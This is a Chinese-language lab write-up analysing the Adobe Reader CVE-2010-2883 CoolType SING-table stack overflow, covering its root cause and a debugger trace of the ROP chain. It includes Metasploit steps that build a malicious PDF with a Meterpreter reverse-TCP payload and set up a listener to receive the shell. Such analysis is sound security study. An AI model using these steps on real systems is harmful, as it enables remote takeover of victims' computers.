CVE-2010-2883 漏洞分析

https://ift.tt/2NPO3ho

分析环境
环境搭建注意事项
静态分析漏洞成因
攻击样本生成
样本exploit 提取
动态调试
shellcode

分析环境

漏洞软件
- adobe reader 9.3.4
运行环境
- windows xp sp3
静态分析工具
- IDA 7.0 MacVersion
动态调试器
- OD1.1
模拟攻击主机
- kali 2018.1
pdf object提取器
- PDF Stream Dumpe

环境搭建注意事项

adobe reader 下载地址 adobe reader 9.x
adober reader 在虚拟机下的安装
- 因为虚拟机通常都是一个盘，这个默认安装需要有一个d盘(问题跟本用不着D盘)，因此以一直报错
- 在终端输入 subst D: %temp% 临时创建一个d盘

静态分析漏洞成因

在CoolTy.dll 中，发现解析SING表的时候，没有验证uniqueName的长度，使用strcat进行拼接字符串的时候，没有对长度进行验证，导致栈溢出。
具体原因见下图：

攻击样本生成

使用msf生成攻击样本

search adobe_cooltype_sing

通过这个图可以看到，第一个是browser的，第二个是文件格式的，肯定选第二个

use exploit/windows/fileformat/adobe_cooltype_sing
使用info查看exploit信息

调用meterpreter载荷，反向连接到靶机机set payload windows/meterpreter/reverse_tcp
使用 show options 显示需要设置的选项

对参数进行设置，并输入exploit命令生成样本

使用MSF监听肉鸡

使用handler监听模块 use exploit/multi/handle
回弹一个tcp连接

设置基本信息后，使用exploit开启监听

目标靶机运行样本

adobe reader 打开pdf文件

已经连接到kali，并获得权限

样本exploit 提取

通过PDF Stream Dumpe提取TTG文件，下载链接

通过搜索字符串，找到了SING表所在的位置

右键单击，Save Decompressed Streams

SING表的定义

typedef sturct_SING
{
    char tag[4];//"SING"
    ULONG checkSum;//校验和
    ULONG offset;//相对文件偏移
    ULONG length;//数据长度
} TableEntry;

也就说，通过截图

得知

0x53494e47是tag[4]
0xd9bcc8b5是校验和
0x0000011c是相对文件偏移
0x00001ddf是数据长度

通过 ULONG offset 可以得知，0x11c是相对于文件的偏移，这个地方就是SING的数据结构
然后SING数据结构再偏移0x10个字节，就是uniqueName的位置,设计的时候共28个字节的大小

动态调试

打开adobe reader，打开od，附加到adobe reader上，然后加载有问题的pdf文件
可以发现在断下来的时候，断在了CoolType这个模块

通过汇编代码可以发现，是取了uniqueName之后，直接复制到esp所在的位置处

执行程序，对strcat拼接后的空间下内存访问断点

发现直接把ebp之后的位置都覆盖了，这里原始的逻辑就有问题
F9运行

一直在循环比较，删掉断点，执行到返回，然后重下内存断点f9

继续跟，发现断在了ROP链0x4a80cb33

紧接着就是一串top，通过栈中的信息可以发现，首先调用的是CreateFile这个api

然后通过其参数，发现创建了一个iso88951的文件

接着执行rop链，发现接下来调用的api是CreateFileOfMapping

并且对这个内存设置了可读，可写可执行
又一片rop链之后，调用了MapViewOfFile

最后调用的memcpy，把shellcode复制到了映射的内存区域执行